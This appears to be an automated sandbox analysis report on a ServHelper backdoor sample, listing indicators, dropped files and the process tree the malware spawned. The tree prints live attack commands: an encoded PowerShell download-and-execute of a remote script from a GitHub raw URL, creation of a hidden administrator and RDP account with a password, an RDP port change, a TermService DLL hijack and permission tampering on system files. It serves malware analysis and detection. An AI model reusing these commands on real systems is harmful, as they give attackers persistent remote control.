Analysis
-
max time kernel
141s -
max time network
170s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
-
submitted
04-01-2024 08:50
General
-
Target
4069c013a2ec0c082f78a73719dcabb7.exe
-
Size
5.9MB
-
MD5
4069c013a2ec0c082f78a73719dcabb7
-
SHA1
14d643ed38a6c64c299bc24379b5b66ac958aff6
-
SHA256
2f279b760ab7916b996d451904e1fea41c0f01bae1c80faddf667b8a865d1a0c
-
SHA512
5a5bdfa931a1f9a2b8855e6331669404f332f504f15a5eae7fb6e51f7ac99bbb83f5c986931fadb00c761e81617a47707cff811eb6e2ebf55369cec8f6002f05
-
SSDEEP
49152:pFWJLirb/TkvO90dL3BmAFd4A64nsfJ5mb5KN0ZKrVbLMe8paAzK1X4FXtPqnJ0x:pF8mmMmAQQQQQQQQQQQQQ
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 7 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Sets DLL path for service in the registry 2 TTPs 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 16 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 19 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7.exe"C:\Users\Admin\AppData\Local\Temp\4069c013a2ec0c082f78a73719dcabb7.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1076.tmp" "c:\Users\Admin\AppData\Local\Temp\gph34r5k\CSCEA538CFBCFDF470090806556397D245D.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Sets DLL path for service in the registry
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc MPmOYrcq /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc MPmOYrcq /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc MPmOYrcq /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" NUPNSVML$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" NUPNSVML$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" NUPNSVML$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc MPmOYrcq1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc MPmOYrcq2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc MPmOYrcq3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
53KB
MD593678e82d776686aa54c42b8a98e6cbc
SHA1802939dfed99ac74814c4371388b204c5810241d
SHA256da32a79a8e04cbafb1c5980b3d6225f4705010df5eb45d464cd5bf6b642d7841
SHA5120b412a1e11c0639d72f6a58c661ecc43da021c010c4d1e66051c5a376ebab287480bbf663345c9bd2a79ec3a35a9788cf04d74d612449f76fe2c87576cd13520
-
C:\Users\Admin\AppData\Local\Temp\RES1076.tmpFilesize
1KB
MD509e2fe065f0dcf3962ee6302908ea9f8
SHA1dccd5a92b84d86193cd1b29be528c8c1648db44e
SHA25637e9a244b313287caab2158db0349feddda79d8d9286ffb3a13e64758ca90f1d
SHA5126a76af819c921e68dfd4f86555400bfd36b0e8fd7f7ef702d8509f784f7464ea2fe6076652811bca8302a247dc44aafa5acf1d9ca1d6050045cebec20e7dd993
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h0ojjzgf.h1z.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.dllFilesize
3KB
MD5d28f6ff2c707ad3f1316cffe55f93f0a
SHA154e0a0b0568235ea9693cca371d8d5b7044a64a7
SHA256291b7ea444efd8775bb3c2f04815a89a1920fa3079fe62fc57fd3b74349f62bc
SHA512c42dbee1fa11269a5b2b55f0daa2ef9240c1edd627091df52be625d00f28337a6e6dd6e082e0644452afde9804b16dad1626225633ebbd444959ed50549b0afe
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1Filesize
1KB
MD53447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1Filesize
2.5MB
MD5c4bcb62d200b6aa544ed9e5b3399c975
SHA17808d467e453b9a8de354af3dab0d10c3e32bee0
SHA256bd62d13d4264bbd68697866bb1975e7f2fa0b591d71a67856c9a5e7b081beba7
SHA51287005bc71aa53c5a880d5401378d024033dd0401f267119be02a2d991258becc95916313a55bbe359ec39325593e17b87af02a30cbed2c82672ccea2ac0af745
-
C:\Windows\Branding\mediasrv.pngFilesize
60KB
MD5f90a95e65ea4b8785701c5016a5319e3
SHA1998ff9ca14eecdee37352a362c5929e6ecadf543
SHA25683e90a20670525dcd14b387165d04c86fd88719b9aa55936318cb5c2a30ef003
SHA5122ffb491306538032143623a4ea38d0adbe031550ae9e3e973d5e7b48c5737aecab4b92f9d3e50c07e1b70f0e3e1a3b8bc499c6c8d4ff1984ba3971357e1c8578
-
C:\Windows\Branding\mediasvc.pngFilesize
743KB
MD5c88ee22ef943b6984da0a92dcbdbb512
SHA1fe6be3ebdc42c32d5a5842fd34d61c6b217e7454
SHA2568697ec4ec5cde1fea30fe0f5ccd3e97ef9fafbb392ac0b4404d012a4fc1afa1d
SHA512108ffb89411d1c0db5ef90d056d91187771ec0103adaa4a97904cb4fd25473208dd4fddc0f6cbba646f21a5d164a5a93c80c989211ceabed863196a4afc319c6
-
C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGI7546.tmpFilesize
24KB
MD5d0e162c0bd0629323ebb1ed88df890d6
SHA1cf3fd2652cdb6ff86d1df215977454390ed4d7bc
SHA2563e6520cd56070637daa5c3d596e57e6b5e3bd1a25a08804ccea1ce4f50358744
SHA512a9c82f1116fce7052d1c45984e87b8f3b9f9afeb16be558fd1ecbd54327350344f37f32bc5d4baabd3e1cf3ac0de75c8ba569c1e34aaf1094cd04641d137c117
-
C:\Windows\system32\rfxvmt.dllFilesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Admin\AppData\Local\Temp\gph34r5k\CSCEA538CFBCFDF470090806556397D245D.TMPFilesize
652B
MD50f017b4f7f7b4484b155a43bfcde0bd8
SHA1c15e3eceaaa49f7a036deea2fdade2240da3a91b
SHA2561ae2b44a90fa4e6775a8b2f1487e1138a96fc0673038382a2e711898d887fad8
SHA512966e47fdcbd3d95463e14223151d663a5f3b8653cc676628eaf21beb77bb173aea0758dc002bc0aa19eed2f33cee43680e0a1873549a7f44bb3c556756cb8c97
-
\??\c:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.0.csFilesize
424B
MD54864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\gph34r5k\gph34r5k.cmdlineFilesize
369B
MD50e5a0783b63db73fa46091d62668bcae
SHA19b1a6b7605f58884f13cfecab03ebeea964a8685
SHA256215377d1875d6ec3415248c4612e633ca69c02db1e6845eeb650ee7cf344c4d0
SHA512eb2ea8ab164c39bb09d6486811ffa149012d46aab9b3d530176d67b57308818536dd04b53214533e1e14960113f3382e9df5c68d3ae9b7df181e93818f4db115
-
memory/468-84-0x00007FFC81640000-0x00007FFC81659000-memory.dmpFilesize
100KB
-
memory/468-41-0x00000232EEF60000-0x00000232EF16A000-memory.dmpFilesize
2.0MB
-
memory/468-33-0x00000232EE550000-0x00000232EE558000-memory.dmpFilesize
32KB
-
memory/468-155-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/468-19-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/468-154-0x00007FFC81640000-0x00007FFC81659000-memory.dmpFilesize
100KB
-
memory/468-116-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/468-7-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/468-40-0x00000232EEBD0000-0x00000232EED46000-memory.dmpFilesize
1.5MB
-
memory/468-17-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/468-18-0x00000232EE560000-0x00000232EE582000-memory.dmpFilesize
136KB
-
memory/468-85-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/468-57-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/468-54-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/468-55-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/468-56-0x00000232EE360000-0x00000232EE370000-memory.dmpFilesize
64KB
-
memory/2308-44-0x000002A0B7DA0000-0x000002A0B7DB0000-memory.dmpFilesize
64KB
-
memory/2308-58-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/2308-43-0x000002A0B7DA0000-0x000002A0B7DB0000-memory.dmpFilesize
64KB
-
memory/2308-42-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/2428-72-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/2428-69-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/2428-70-0x000001EA7E220000-0x000001EA7E230000-memory.dmpFilesize
64KB
-
memory/3076-37-0x00000228EB910000-0x00000228EB920000-memory.dmpFilesize
64KB
-
memory/3076-158-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/3076-35-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/3076-0-0x00000228EC480000-0x00000228EC8A6000-memory.dmpFilesize
4.1MB
-
memory/3076-39-0x00000228EB910000-0x00000228EB920000-memory.dmpFilesize
64KB
-
memory/3076-3-0x00000228EB910000-0x00000228EB920000-memory.dmpFilesize
64KB
-
memory/3076-4-0x00000228EB910000-0x00000228EB920000-memory.dmpFilesize
64KB
-
memory/3076-2-0x00000228EB910000-0x00000228EB920000-memory.dmpFilesize
64KB
-
memory/3076-38-0x00000228EB910000-0x00000228EB920000-memory.dmpFilesize
64KB
-
memory/3076-1-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/4140-105-0x00000196FAC80000-0x00000196FAC90000-memory.dmpFilesize
64KB
-
memory/4140-106-0x00000196FAC80000-0x00000196FAC90000-memory.dmpFilesize
64KB
-
memory/4140-148-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/4140-149-0x00000196FAC80000-0x00000196FAC90000-memory.dmpFilesize
64KB
-
memory/4140-104-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/4140-156-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/4732-83-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
-
memory/4732-73-0x00007FFC72E60000-0x00007FFC73921000-memory.dmpFilesize
10.8MB
